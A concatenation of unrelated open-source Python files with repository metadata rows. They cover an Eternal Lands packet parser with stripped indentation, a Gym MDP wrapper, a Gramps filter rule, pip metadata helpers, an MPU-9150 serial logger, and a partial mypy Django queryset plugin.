from pyela.el.util.strings import strip_chars, split_str, is_colour, el_colour_to_rgb, bytes_find, bytes_rfind
from pyela.el.net.packets import ELPacket
from pyela.el.net.elconstants import ELNetFromServer, ELNetToServer, ELConstants
from pyela.el.net.channel import Channel
from pyela.el.logic.eventmanagers import ELSimpleEventManager
from pyela.el.logic.events import ELEventType, ELEvent
log = logging.getLogger('pyela.el.net.parsers')
em = ELSimpleEventManager()
class MessageParser(object):
"""A message received from the Eternal Lands server"""
def __init__(self, connection):
"""The connection should be an instance of ELConnection"""
self.connection = connection
def parse(self, packet):
"""Parse the given packet and return a list of Event
instances (or derivatives) (if any)
"""
pass
class ELRawTextMessageParser(MessageParser):
"""Parses RAW_TEXT messages"""
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.RAW_TEXT))
event.data = {}
event.data['connection'] = self.connection #The connection the message origins from
event.data['channel'] = packet.data[0] # The channel of the message
event.data['text'] = strip_chars(packet.data[1:]) # The stripped text of the message, no colour codes, special characters translated to utf8
event.data['raw'] = packet.data[1:] # The raw text including colour codes and untranslated special characters
return [event]
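# Minimal sketch of the parser contract (hypothetical subclass): parsers
# receive an ELPacket and return a list of ELEvent instances.
#
#   class MyParser(MessageParser):
#       def parse(self, packet):
#           event = ELEvent(ELEventType(packet.type))
#           event.data = {'connection': self.connection, 'raw': packet.data}
#           return [event]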
class ELAddActorMessageParser(MessageParser):
def parse(self, packet):
"""Parse an ADD_NEW_(ENHANCED)_ACTOR message"""
if log.isEnabledFor(logging.DEBUG): log.debug("New actor: %s" % packet)
actor = ELActor()
actor.id, actor.x_pos, actor.y_pos, actor.z_pos, \
actor.z_rot, actor.type, frame, actor.max_health, \
actor.cur_health, actor.kind_of_actor \
= struct.unpack('<HHHHHBBHHB', packet.data[:17])
events = []
#Remove the buffs from the x/y coordinates
actor.x_pos = actor.x_pos & 0x7FF
actor.y_pos = actor.y_pos & 0x7FF
if packet.type == ELNetFromServer.ADD_NEW_ENHANCED_ACTOR:
actor.name = packet.data[28:]
frame = packet.data[22] #For some reason, data[11] is unused in the ENHANCED message
actor.kind_of_actor = packet.data[27]
else:
actor.name = packet.data[17:]
#The end of name is a \0, and there _might_ be two OR three more bytes
# containing actor-scale info.
name_end = bytes_find(actor.name, 0)
if name_end < len(actor.name)-2:
#There are two OR three more bytes after the name,
# the actor scaling bytes and possibly the attachment type
unpacked = struct.unpack('<H', actor.name[name_end+1:name_end+3])
actor.scale = unpacked[0]
#actor.scale = float(scale)/ELConstants.ACTOR_SCALE_BASE
if len(actor.name) > name_end+3:
pass
#TODO: The actor class has no attachment_type member (yet)
# The below code is tested and extracts the correct information
#actor.attachment_type = struct.unpack('B', actor.name[name_end+3])[0]
#if actor.attachment_type > 0 and actor.attachment_type < 255:
# ##ON A HORSE!!
#else:
# actor.attachment_type = 0 # The server sends either 255 or 0 if we're not on a horse
actor.name = actor.name[:name_end]
else:
actor.scale = 1
actor.name = actor.name[:-1]
#Find the actor's name's colour char
i = 0
while i < len(actor.name) and is_colour(actor.name[i]):
actor.name_colour = el_colour_to_rgb(actor.name[i])
i += 1
if actor.name_colour[0] == -1:
#We didn't find any colour codes, use kind_of_actor
if actor.kind_of_actor == ELConstants.NPC:
#NPC, bluish
#The official client colour is (0.3, 0.8, 1.0), but it's too green to see on the minimap
actor.name_colour = (0.0, 0.0, 1.0)
elif actor.kind_of_actor in (ELConstants.HUMAN, ELConstants.COMPUTER_CONTROLLED_HUMAN):
#Regular player, white
actor.name_colour = (1.0, 1.0, 1.0)
elif packet.type == ELNetFromServer.ADD_NEW_ENHANCED_ACTOR and actor.kind_of_actor in (ELConstants.PKABLE_HUMAN, ELConstants.PKABLE_COMPUTER_CONTROLLED):
#PKable player, red
actor.name_colour = (1.0, 0.0, 0.0)
else:
#Animal, yellow
actor.name_colour = (1.0, 1.0, 0.0)
space = bytes_rfind(actor.name, ord(' '))
if space != -1 and space > 0 and space+1 < len(actor.name) and is_colour(actor.name[space+1]):
actor.name = strip_chars(actor.name)
if log.isEnabledFor(logging.DEBUG): log.debug("Actor has a guild. Parsing from '%s'" % actor.name)
# split the name into playername and guild
tokens = actor.name.rsplit(' ', 1)
actor.name = tokens[0]
actor.guild = tokens[1]
else:
actor.name = strip_chars(actor.name)
#Deal with the current frame of the actor
if frame in (ELConstants.FRAME_DIE1, ELConstants.FRAME_DIE2):
actor.dead = True
elif frame in (ELConstants.FRAME_COMBAT_IDLE, ELConstants.FRAME_IN_COMBAT):
actor.fighting = True
elif frame >= ELConstants.FRAME_ATTACK_UP_1 and frame <= ELConstants.FRAME_ATTACK_UP_10:
actor.fighting = True
elif frame in (ELConstants.PAIN1, ELConstants.PAIN2):
actor.fighting = True
self.connection.session.actors[actor.id] = actor
event = ELEvent(ELEventType(ELNetFromServer.ADD_NEW_ACTOR))
event.data = actor #TODO: add connection to event data
events.append(event)
if actor.id == self.connection.session.own_actor_id:
self.connection.session.own_actor = actor
event = ELEvent(ELEventType(ELNetFromServer.YOU_ARE))
event.data = actor #TODO: add connection to event data
events.append(event)
if log.isEnabledFor(logging.DEBUG): log.debug("Actor parsed: %s, %s, %s, %s, %s, %s, %s, %s, %s, %s" % (actor.id, actor.x_pos, actor.y_pos, actor.z_pos, \
actor.z_rot, actor.type, actor.max_health, \
actor.cur_health, actor.kind_of_actor, actor.name))
return events
class ELRemoveActorMessageParser(MessageParser):
def _get_ids(data):
offset = 0
while offset < len(data):
yield struct.unpack_from('<H', data, offset)[0]
offset += 2
_get_ids = staticmethod(_get_ids)
def parse(self, packet):
"""Remove actor packet. Remove from self.connection.session.actors dict"""
if log.isEnabledFor(logging.DEBUG): log.debug("Remove actor packet: '%s'" % packet.data)
if log.isEnabledFor(logging.DEBUG): log.debug("Actors: %s" % self.connection.session.actors)
        events = []
        for actor_id in self._get_ids(packet.data):
            event = ELEvent(ELEventType(ELNetFromServer.REMOVE_ACTOR))
            event.data = {}
            event.data['connection'] = self.connection
            event.data['id'] = actor_id
            if actor_id in self.connection.session.actors:
                event.data['actor'] = self.connection.session.actors[actor_id]
                del self.connection.session.actors[actor_id]
                if actor_id == self.connection.session.own_actor_id:
                    self.connection.session.own_actor_id = -1
                    self.connection.session.own_actor = None
            events.append(event)
        return events
class ELRemoveAllActorsParser(MessageParser):
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.KILL_ALL_ACTORS))
event.data = {'connection': self.connection} # The full actors list can be added to the event data if it's required
self.connection.session.actors = {}
if log.isEnabledFor(logging.DEBUG): log.debug("Remove all actors packet")
return [event]
class ELAddActorCommandParser(MessageParser):
def _get_commands(data):
offset = 0
while offset < len(data):
yield struct.unpack_from('<HB', data, offset)
offset += 3
_get_commands = staticmethod(_get_commands)
def parse(self, packet):
events = []
if log.isEnabledFor(logging.DEBUG): log.debug("Actor command packet: '%s'" % packet.data)
for actor_id, command in self._get_commands(packet.data):
if actor_id in self.connection.session.actors:
self.connection.session.actors[actor_id].handle_command(command)
event = ELEvent(ELEventType(ELNetFromServer.ADD_ACTOR_COMMAND))
event.data = {'actor': self.connection.session.actors[actor_id], 'command': command, 'connection': self.connection}
events.append(event)
else:
#The actor could not be found. Something strange has happened.
#Request a new list of nearby actors from the server (resync).
#TODO: Log?
self.connection.send(ELPacket(ELNetToServer.SEND_ME_MY_ACTORS, None))
return events
class ELYouAreParser(MessageParser):
def parse(self, packet):
if log.isEnabledFor(logging.DEBUG): log.debug("YouAre packet: '%s'" % packet.data)
id = struct.unpack('<H', packet.data)[0]
self.connection.session.own_actor_id = id
if id in self.connection.session.actors:
self.connection.session.own_actor = self.connection.session.actors[id]
event = ELEvent(ELEventType(ELNetFromServer.YOU_ARE))
event.data = self.connection.session.own_actor #TODO: Add connection to event.data
return[event]
return []
class ELGetActiveChannelsMessageParser(MessageParser):
"""parse the GET_ACTIVE_CHANNELS message"""
def parse(self, packet):
del self.connection.session.channels[:]
        # Message structure: index of the active channel slot, followed by four uint32 channel numbers (0 = unused slot)
chans = struct.unpack('<BIIII', packet.data)
i = 0
active = chans[0]
for c in chans[1:]:
if c != 0:
self.connection.session.channels.append(Channel(self.connection, c, i == active))
i += 1
#Event to notify about the change in the channel list
event = ELEvent(ELEventType(ELNetFromServer.GET_ACTIVE_CHANNELS))
event.data = {'connection': self.connection, 'channels': self.connection.session.channels}
return [event]
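# Wire-format sketch for this message (hypothetical values): 17 bytes,
# little-endian; one byte for the active slot plus four uint32 channels:
#
#   struct.pack('<BIIII', 1, 100, 6, 0, 0)
#   # -> slot 1 active; channels 100 and 6 joined; two empty slots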
class ELBuddyEventMessageParser(MessageParser):
"""Parse the BUDDY_EVENT message"""
def parse(self, packet):
        change = ord(packet.data[0]) # 1 is online, 0 offline (byte value, not int, in Python 2)
event = ELEvent(ELEventType(ELNetFromServer.BUDDY_EVENT))
event.data = {}
if change == 1:
#Buddy came online
buddy = str(strip_chars(packet.data[2:]))
self.connection.session.buddies.append(buddy)
event.data['event'] = 'online'
else:
#Buddy went offline
buddy = str(strip_chars(packet.data[1:]))
self.connection.session.buddies.remove(buddy)
event.data['event'] = 'offline'
event.data['name'] = buddy
event.data['connection'] = self.connection
return [event]
class ELLoginFailedParser(MessageParser):
"""Parse the LOG_IN_NOT_OK message"""
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.LOG_IN_NOT_OK))
event.data = {}
event.data['text'] = strip_chars(packet.data)
event.data['raw'] = packet.data
event.data['connection'] = self.connection
return [event]
class ELYouDontExistParser(MessageParser):
"""Parse the YOU_DONT_EXIST message"""
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.YOU_DONT_EXIST))
event.data = {}
event.data['connection'] = self.connection
        return [event]
class ELLoginOKParser(MessageParser):
"""Parse the LOG_IN_OK message"""
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.LOG_IN_OK))
event.data = {}
event.data['connection'] = self.connection
self.connection.con_tries = 0
return [event]
class ELPingRequestParser(MessageParser):
"""Parse the PING_REQUEST message and respond with the appropriate message.
Does not raise an event, as this is strictly a protocol feature and not
something the application itself should worry about."""
def parse(self, packet):
# Send the message back as-is.
self.connection.send(ELPacket(ELNetToServer.PING_RESPONSE, packet.data))
return []
class ELNewMinuteParser(MessageParser):
def parse(self, packet):
if len(packet.data) != 2:
#TODO: Invalid message
return []
self.connection.session.game_time = struct.unpack('<H', packet.data)[0]
self.connection.session.game_time %= 360 #Clamp to six-hour time
event = ELEvent(ELEventType(ELNetFromServer.NEW_MINUTE))
event.data = {}
event.data['connection'] = self.connection
event.data['time'] = self.connection.session.game_time
return [event]
class ELChangeMapParser(MessageParser):
def parse(self, packet):
self.connection.session.current_map = packet.data
event = ELEvent(ELEventType(ELNetFromServer.CHANGE_MAP))
event.data = {}
event.data['connection'] = self.connection
event.data['map'] = self.connection.session.current_map
return [event]
| gpl-3.0 | 5,822,827,569,618,822,000 | 38.790909 | 156 | 0.718605 | false | 3.087468 | false | false | false |
david-abel/simple_rl | simple_rl/tasks/gym/GymMDPClass.py | 1 | 2220 | '''
GymMDPClass.py: Contains implementation for MDPs of the Gym Environments.
'''
# Python imports.
import random
import sys
import os
import random
from collections import defaultdict
# Other imports.
import gym
from simple_rl.mdp.MDPClass import MDP
from simple_rl.tasks.gym.GymStateClass import GymState
class GymMDP(MDP):
''' Class for Gym MDPs '''
def __init__(self, env_name='CartPole-v0', render=False, render_every_n_episodes=0):
'''
Args:
env_name (str)
render (bool): If True, renders the screen every time step.
render_every_n_epsiodes (int): @render must be True, then renders the screen every n episodes.
'''
# self.render_every_n_steps = render_every_n_steps
self.render_every_n_episodes = render_every_n_episodes
self.episode = 0
self.env_name = env_name
self.env = gym.make(env_name)
self.render = render
MDP.__init__(self, range(self.env.action_space.n), self._transition_func, self._reward_func, init_state=GymState(self.env.reset()))
def get_parameters(self):
'''
Returns:
(dict) key=param_name (str) --> val=param_val (object).
'''
param_dict = defaultdict(int)
param_dict["env_name"] = self.env_name
return param_dict
def _reward_func(self, state, action, next_state):
'''
Args:
            state (GymState)
action (str)
Returns
(float)
'''
return self.prev_reward
def _transition_func(self, state, action):
'''
Args:
            state (GymState)
action (str)
Returns
(State)
'''
obs, reward, is_terminal, info = self.env.step(action)
if self.render and (self.render_every_n_episodes == 0 or self.episode % self.render_every_n_episodes == 0):
self.env.render()
self.prev_reward = reward
self.next_state = GymState(obs, is_terminal=is_terminal)
return self.next_state
def reset(self):
self.env.reset()
self.episode += 1
def __str__(self):
return "gym-" + str(self.env_name)
| apache-2.0 | -8,199,863,990,945,955,000 | 26.75 | 139 | 0.582883 | false | 3.603896 | false | false | false |
Forage/Gramps | gramps/gen/filters/rules/_matchessourceconfidencebase.py | 1 | 2347 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2011 Jerome Rapinat
# Copyright (C) 2011 Douglas S. Blank
# Copyright (C) 2011 Benny Malengier
# Copyright (C) 2011 Tim G L Lyons
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# gen.filters.rules/_MatchesSourceConfidenceBase.py
# $Id$
#
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from ...const import GRAMPS_LOCALE as glocale
_ = glocale.get_translation().gettext
#-------------------------------------------------------------------------
#
# GRAMPS modules
#
#-------------------------------------------------------------------------
from . import Rule
#-------------------------------------------------------------------------
# "Confidence level"
# Sources of an attribute of an event are ignored
#-------------------------------------------------------------------------
class MatchesSourceConfidenceBase(Rule):
"""Objects with a specific confidence level on 'direct' Source references"""
labels = ['Confidence level:']
name = 'Object with at least one direct source >= <confidence level>'
description = "Matches objects with at least one direct source with confidence level(s)"
category = _('Citation/source filters')
def apply(self, db, obj):
required_conf = int(self.list[0])
for citation_handle in obj.get_citation_list():
citation = db.get_citation_from_handle(citation_handle)
if required_conf <= citation.get_confidence_level():
return True
return False
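# Hedged illustration (not in the original module): how a concrete rule is
# typically derived from this base class. `ExampleConfidenceRule` is a
# hypothetical subclass shown only to make the pattern explicit; real Gramps
# rules would also be registered with the appropriate filter editor.
class ExampleConfidenceRule(MatchesSourceConfidenceBase):
    """Hypothetical concrete rule reusing apply() from the base class."""
    labels = ['Confidence level:']
    name = 'Example object with direct source >= <confidence level>'
    description = "Illustrative subclass; matching logic lives in the base"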
| gpl-2.0 | 6,077,626,136,033,357,000 | 38.116667 | 92 | 0.57222 | false | 4.611002 | false | false | false |
jhayworth/config | .emacs.d/elpy/rpc-venv/lib/python2.7/site-packages/pip/_internal/utils/packaging.py | 32 | 3035 | from __future__ import absolute_import
import logging
from email.parser import FeedParser
from pip._vendor import pkg_resources
from pip._vendor.packaging import specifiers, version
from pip._internal.exceptions import NoneMetadataError
from pip._internal.utils.misc import display_path
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import Optional, Tuple
from email.message import Message
from pip._vendor.pkg_resources import Distribution
logger = logging.getLogger(__name__)
def check_requires_python(requires_python, version_info):
# type: (Optional[str], Tuple[int, ...]) -> bool
"""
Check if the given Python version matches a "Requires-Python" specifier.
:param version_info: A 3-tuple of ints representing a Python
major-minor-micro version to check (e.g. `sys.version_info[:3]`).
:return: `True` if the given Python version satisfies the requirement.
Otherwise, return `False`.
:raises InvalidSpecifier: If `requires_python` has an invalid format.
"""
if requires_python is None:
# The package provides no information
return True
requires_python_specifier = specifiers.SpecifierSet(requires_python)
python_version = version.parse('.'.join(map(str, version_info)))
return python_version in requires_python_specifier
def get_metadata(dist):
# type: (Distribution) -> Message
"""
:raises NoneMetadataError: if the distribution reports `has_metadata()`
True but `get_metadata()` returns None.
"""
metadata_name = 'METADATA'
if (isinstance(dist, pkg_resources.DistInfoDistribution) and
dist.has_metadata(metadata_name)):
metadata = dist.get_metadata(metadata_name)
elif dist.has_metadata('PKG-INFO'):
metadata_name = 'PKG-INFO'
metadata = dist.get_metadata(metadata_name)
else:
logger.warning("No metadata found in %s", display_path(dist.location))
metadata = ''
if metadata is None:
raise NoneMetadataError(dist, metadata_name)
feed_parser = FeedParser()
    # The following line errors out with a "NoneType" TypeError if
    # passed metadata=None.
feed_parser.feed(metadata)
return feed_parser.close()
def get_requires_python(dist):
# type: (pkg_resources.Distribution) -> Optional[str]
"""
Return the "Requires-Python" metadata for a distribution, or None
if not present.
"""
pkg_info_dict = get_metadata(dist)
requires_python = pkg_info_dict.get('Requires-Python')
if requires_python is not None:
# Convert to a str to satisfy the type checker, since requires_python
# can be a Header object.
requires_python = str(requires_python)
return requires_python
def get_installer(dist):
# type: (Distribution) -> str
if dist.has_metadata('INSTALLER'):
for line in dist.get_metadata_lines('INSTALLER'):
if line.strip():
return line.strip()
return ''
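# Hedged usage sketch (not in the original module): exercising
# check_requires_python() with a literal specifier. Safe to call directly;
# the values are illustrative only.
def _example_requires_python_check():
    # A package requiring Python >= 3.6 is satisfied by 3.8.0.
    return check_requires_python('>=3.6', version_info=(3, 8, 0))  # True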
| gpl-3.0 | 6,347,136,353,345,223,000 | 31.287234 | 78 | 0.68369 | false | 4.073826 | false | false | false |
IEEEDTU/CMS | Resource/models/Publication.py | 1 | 2839 | from django.db import models
from .Resource import *
class PublicationManager(models.Manager):
def addPublication(self, request):
""" add new publication """
R = Resource.objects.addResource(request)
P = Publication(
resource=R,
title=request['title'],
authors=request['authors'],
publicationDate=request['publicationDate'],
organization=request['organization'],
link=request['link']
)
P.save()
return P
def editPublication(self, request):
""" edit existing publication """
R = Resource.objects.editResource(request)
P = Publication.objects.get(resource=R)
P.title = request['title']
P.authors = request['authors']
P.publicationDate = request['publicationDate']
P.organization = request['organization']
P.link = request['link']
P.save()
return P
def getDocumentById(self, request):
""" get publication details on the basis of resource ID """
R = Resource.objects.getResourceById(request)
P = Publication.objects.get(resource=R)
return P
def retrievePublications(self, request):
""" retrieve details of all the publications depending on the request """
""" note: courseId is compulsory field; title, authors, organization, link are optional fields """
R = Resource.objects.retrieveResources(request)
P = Publication.objects.filter(pk__in=R)
        if 'title' in request.keys():
            P = P.filter(title=request['title'])
        if 'authors' in request.keys():
            P = P.filter(authors=request['authors'])
        if 'organization' in request.keys():
            P = P.filter(organization=request['organization'])
        if 'link' in request.keys():
            P = P.filter(link=request['link'])
return P
def deletePublication(self, request):
""" deletes existing publication """
R = Resource.objects.getResourceById(request)
P = Publication.objects.get(resource=R)
P.delete()
R.delete()
return P
class Publication(models.Model):
# Resource
resource = models.OneToOneField(Resource, on_delete=models.CASCADE, primary_key=True)
# Title
title = models.CharField(max_length=500, blank=False, null=False)
# Authors
authors = models.CharField(max_length=250)
# Publication date
publicationDate = models.DateField(editable=True, auto_now=False, auto_now_add=False)
# Organization
organization = models.CharField(max_length=100)
# Link
link = models.URLField()
objects = PublicationManager()
def __str__(self):
return self.title + " - " + self.authors + " - " + self.publicationDate
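# Hedged usage sketch (not part of the original file): the request dict shape
# the manager methods above expect. All field values are illustrative only,
# and the function is defined but never executed at import time.
def _example_add_publication():
    request = {
        'title': 'An Example Paper',
        'authors': 'A. Author, B. Author',
        'publicationDate': '2017-01-01',
        'organization': 'Example University',
        'link': 'http://example.com/paper',
        # ...plus whatever Resource.objects.addResource(request) requires.
    }
    return Publication.objects.addPublication(request)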
| mit | -3,805,081,301,058,507,000 | 34.4875 | 106 | 0.624868 | false | 4.301515 | false | false | false |
stochasticHydroTools/RotationalDiffusion | sphere/checkSPD.py | 1 | 1283 | '''Check if the new sphere mobility is positive definite for all distance'''
import numpy as np
import sys
import sphere as sph
sys.path.append('..')
from fluids import mobility as mb
from quaternion_integrator.quaternion import Quaternion
if __name__ == '__main__':
# Parameters
points = 1000
distance = sph.A * 2
orientation = Quaternion([1., 0., 0., 0.])
location = [ [0., 0., distance] ]
dd = (distance - sph.A * 0.9) / float(points)
distance = distance + dd
  # Loop over distances
  for i in range(points):
    distance -= dd
    #print i, distance
    location = [ [0., 0., distance] ]
    mobility = sph.sphere_mobility(location, orientation)
    data = str(distance/sph.A) + ' '
    data += str(mobility[0, 0] * (6.0*np.pi*sph.ETA * sph.A)) + ' '
    data += str(mobility[2, 2] * (6.0*np.pi*sph.ETA * sph.A)) + ' '
    data += str(mobility[3, 3] * (8.0*np.pi*sph.ETA * sph.A**3)) + ' '
    data += str(mobility[5, 5] * (8.0*np.pi*sph.ETA * sph.A**3)) + ' '
    data += str(mobility[0, 4] * (6.0*np.pi*sph.ETA * sph.A**2))
    print data
    # np.linalg.cholesky raises LinAlgError if the matrix is not positive definite.
    mobility_half = np.linalg.cholesky(mobility)
  print "#END"
| gpl-3.0 | 6,660,634,305,839,014,000 | 25.183673 | 79 | 0.533125 | false | 3.129268 | false | false | false |
ZiktoTae/pyMpuFirmwareDebugger | logger.py | 1 | 5551 | #!/usr/bin/python
import sys
import serial
from serial.tools import list_ports
from mpudata import quat_packet, debug_packet, data_packet
import os
import time
import numpy as np
import matplotlib.pyplot as plt
import euclid
class mpu9150interface(object):
def __init__(self):
#self.connect()
#self.read()
print "init"
self.SIZE = 100
self.x_list = [None]*self.SIZE
self.y_list = [None]*self.SIZE
self.z_list = [None]*self.SIZE
self.mag_list = [None]*self.SIZE
self.quat_list = [None]*self.SIZE
self.accel_list = [None]*self.SIZE
self.calibrated_list = [None] * self.SIZE
        self.port = "null"
        self.gravity = np.array([0, 0, 0])
        # Packet counters; initialise here so zeroing() works before read().
        self.index = 0
        self.index_quat = 0
        self.index_accel = 0
def connect(self):
ports = list(self.serial_ports())
for idx,val in enumerate(ports):
print str(idx) + ". "+val
num = raw_input("Select the port for the MPU-9150 : ")
self.port = ports[int(num)]
self.s = serial.Serial(self.port , 115200 , timeout=1)
#self.ser.open()
if self.s.isOpen():
print "Connected..."
else:
self.s.open()
def send(self, str):
for i in range(0,len(str)):
self.s.write(str[i])
time.sleep(0.1)
def write(self):
command = ""
while command != "q":
command = raw_input("To Mpu>")
self.send(command)
def serial_ports(self):
"""
Returns a generator for all available serial ports
"""
if os.name == 'nt':
# windows
for i in range(256):
try:
s = serial.Serial(i)
s.close()
yield 'COM' + str(i + 1)
except serial.SerialException:
pass
else:
# unix
for port in list_ports.comports():
yield port[0]
def zeroing(self):
self.index=0
while (self.index <2 ):
self.read_debug()
#print self.index,
self.gravity = np.array([ self.data[0],self.data[1] ,self.data[2] ])
print self.gravity
def read_debug(self):
NUM_BYTES = 23
p = None
time.sleep(0.01)
while self.s.inWaiting() >= NUM_BYTES:
if self.index_accel >= self.SIZE:
break
rs = self.s.read(NUM_BYTES)
if ord(rs[0]) == ord('$'):
pkt_code = ord(rs[1])
#print "."
#print "\r"+str(pkt_code),
if pkt_code == 1:
d = debug_packet(rs)
d.display()
elif pkt_code == 2:
p = quat_packet(rs)
self.quat_list[self.index_quat] = p
self.index_quat = self.index_quat + 1
#p.display()
print "+"
elif pkt_code == 3:
d = data_packet(rs)
#d.display()
self.data = d.data
datatype = d.type
                    if datatype ==0:
                        # Count accel packets so zeroing()'s loop terminates.
                        self.index = self.index + 1
self.accel_list[self.index_accel] = d
self.x_list[self.index_accel] = d.data[0]
self.y_list[self.index_accel] = d.data[1]
self.z_list[self.index_accel] = d.data[2]
vec = [d.data[0] , d.data[1], d.data[2]]
vec = vec - self.gravity
norm = np.linalg.norm(vec)
norm = norm-1
self.mag_list[self.index_accel] = norm
self.index_accel = self.index_accel +1
print "-",
sys.stdout.flush()
def read(self):
self.index_quat = 0
self.index_accel = 0
print "logging..."
n=0
while( self.index_accel < (self.SIZE-1)):
self.read_debug()
print self.index_accel,
sys.stdout.flush()
self.s.close()
print "plotting..."
#plt.plot(self.mag_list)
#plt.show()
for i in range(0,self.SIZE):
#print i
q = self.quat_list[i]
d = self.accel_list[i]
if (q is not None) and (d is not None):
#if not isinstance(q,None) and not isinstance(d,None)
#print d
v = euclid.Vector3(d.data[0], d.data[1], d.data[2])
quat = q.to_q().conjugated()
#print quat
#print v
###########
q = quat*v
self.calibrated_list[i] = q
if __name__ =="__main__":
mpu =mpu9150interface()
if (len(sys.argv) == 2):
if sys.argv[1] == "setup":
mpu.connect()
mpu.write()
mpu.s.close()
else:
mpu.s = serial.Serial(sys.argv[1],115200, timeout =1)
print mpu.s
if(mpu.s.isOpen()):
print "connected..."
#mpu.s = serial.Serial("/dev/cu.usbmodemfa141",115200, timeout =1)
#mpu.read()
#raw_input("press enter to zeroing...")
#mpu.zeroing()
raw_input("press enter to start...")
mpu.read()
| gpl-2.0 | -1,227,144,257,575,223,300 | 30.185393 | 86 | 0.443344 | false | 3.833564 | false | false | false |
snakeleon/YouCompleteMe-x64 | third_party/ycmd/third_party/jedi_deps/jedi/jedi/third_party/django-stubs/mypy_django_plugin/transformers/querysets.py | 2 | 8440 | from collections import OrderedDict
from typing import List, Optional, Sequence, Type
from django.core.exceptions import FieldError
from django.db.models.base import Model
from django.db.models.fields.related import RelatedField
from django.db.models.fields.reverse_related import ForeignObjectRel
from mypy.nodes import Expression, NameExpr
from mypy.plugin import FunctionContext, MethodContext
from mypy.types import AnyType, Instance
from mypy.types import Type as MypyType
from mypy.types import TypeOfAny
from mypy_django_plugin.django.context import (
DjangoContext, LookupsAreUnsupported,
)
from mypy_django_plugin.lib import fullnames, helpers
def _extract_model_type_from_queryset(queryset_type: Instance) -> Optional[Instance]:
for base_type in [queryset_type, *queryset_type.type.bases]:
if (len(base_type.args)
and isinstance(base_type.args[0], Instance)
and base_type.args[0].type.has_base(fullnames.MODEL_CLASS_FULLNAME)):
return base_type.args[0]
return None
def determine_proper_manager_type(ctx: FunctionContext) -> MypyType:
default_return_type = ctx.default_return_type
assert isinstance(default_return_type, Instance)
outer_model_info = helpers.get_typechecker_api(ctx).scope.active_class()
if (outer_model_info is None
or not outer_model_info.has_base(fullnames.MODEL_CLASS_FULLNAME)):
return default_return_type
return helpers.reparametrize_instance(default_return_type, [Instance(outer_model_info, [])])
def get_field_type_from_lookup(ctx: MethodContext, django_context: DjangoContext, model_cls: Type[Model],
*, method: str, lookup: str) -> Optional[MypyType]:
try:
lookup_field = django_context.resolve_lookup_into_field(model_cls, lookup)
except FieldError as exc:
ctx.api.fail(exc.args[0], ctx.context)
return None
except LookupsAreUnsupported:
return AnyType(TypeOfAny.explicit)
if ((isinstance(lookup_field, RelatedField) and lookup_field.column == lookup)
or isinstance(lookup_field, ForeignObjectRel)):
related_model_cls = django_context.get_field_related_model_cls(lookup_field)
if related_model_cls is None:
return AnyType(TypeOfAny.from_error)
lookup_field = django_context.get_primary_key_field(related_model_cls)
field_get_type = django_context.get_field_get_type(helpers.get_typechecker_api(ctx),
lookup_field, method=method)
return field_get_type
def get_values_list_row_type(ctx: MethodContext, django_context: DjangoContext, model_cls: Type[Model],
flat: bool, named: bool) -> MypyType:
field_lookups = resolve_field_lookups(ctx.args[0], django_context)
if field_lookups is None:
return AnyType(TypeOfAny.from_error)
typechecker_api = helpers.get_typechecker_api(ctx)
if len(field_lookups) == 0:
if flat:
primary_key_field = django_context.get_primary_key_field(model_cls)
lookup_type = get_field_type_from_lookup(ctx, django_context, model_cls,
lookup=primary_key_field.attname, method='values_list')
assert lookup_type is not None
return lookup_type
elif named:
column_types: 'OrderedDict[str, MypyType]' = OrderedDict()
for field in django_context.get_model_fields(model_cls):
column_type = django_context.get_field_get_type(typechecker_api, field,
method='values_list')
column_types[field.attname] = column_type
return helpers.make_oneoff_named_tuple(typechecker_api, 'Row', column_types)
else:
# flat=False, named=False, all fields
field_lookups = []
for field in django_context.get_model_fields(model_cls):
field_lookups.append(field.attname)
if len(field_lookups) > 1 and flat:
typechecker_api.fail("'flat' is not valid when 'values_list' is called with more than one field", ctx.context)
return AnyType(TypeOfAny.from_error)
column_types = OrderedDict()
for field_lookup in field_lookups:
lookup_field_type = get_field_type_from_lookup(ctx, django_context, model_cls,
lookup=field_lookup, method='values_list')
if lookup_field_type is None:
return AnyType(TypeOfAny.from_error)
column_types[field_lookup] = lookup_field_type
if flat:
assert len(column_types) == 1
row_type = next(iter(column_types.values()))
elif named:
row_type = helpers.make_oneoff_named_tuple(typechecker_api, 'Row', column_types)
else:
row_type = helpers.make_tuple(typechecker_api, list(column_types.values()))
return row_type
def extract_proper_type_queryset_values_list(ctx: MethodContext, django_context: DjangoContext) -> MypyType:
# called on the Instance, returns QuerySet of something
assert isinstance(ctx.type, Instance)
assert isinstance(ctx.default_return_type, Instance)
model_type = _extract_model_type_from_queryset(ctx.type)
if model_type is None:
return AnyType(TypeOfAny.from_omitted_generics)
model_cls = django_context.get_model_class_by_fullname(model_type.type.fullname)
if model_cls is None:
return ctx.default_return_type
flat_expr = helpers.get_call_argument_by_name(ctx, 'flat')
if flat_expr is not None and isinstance(flat_expr, NameExpr):
flat = helpers.parse_bool(flat_expr)
else:
flat = False
named_expr = helpers.get_call_argument_by_name(ctx, 'named')
if named_expr is not None and isinstance(named_expr, NameExpr):
named = helpers.parse_bool(named_expr)
else:
named = False
if flat and named:
ctx.api.fail("'flat' and 'named' can't be used together", ctx.context)
return helpers.reparametrize_instance(ctx.default_return_type, [model_type, AnyType(TypeOfAny.from_error)])
# account for possible None
flat = flat or False
named = named or False
row_type = get_values_list_row_type(ctx, django_context, model_cls,
flat=flat, named=named)
return helpers.reparametrize_instance(ctx.default_return_type, [model_type, row_type])
def resolve_field_lookups(lookup_exprs: Sequence[Expression], django_context: DjangoContext) -> Optional[List[str]]:
field_lookups = []
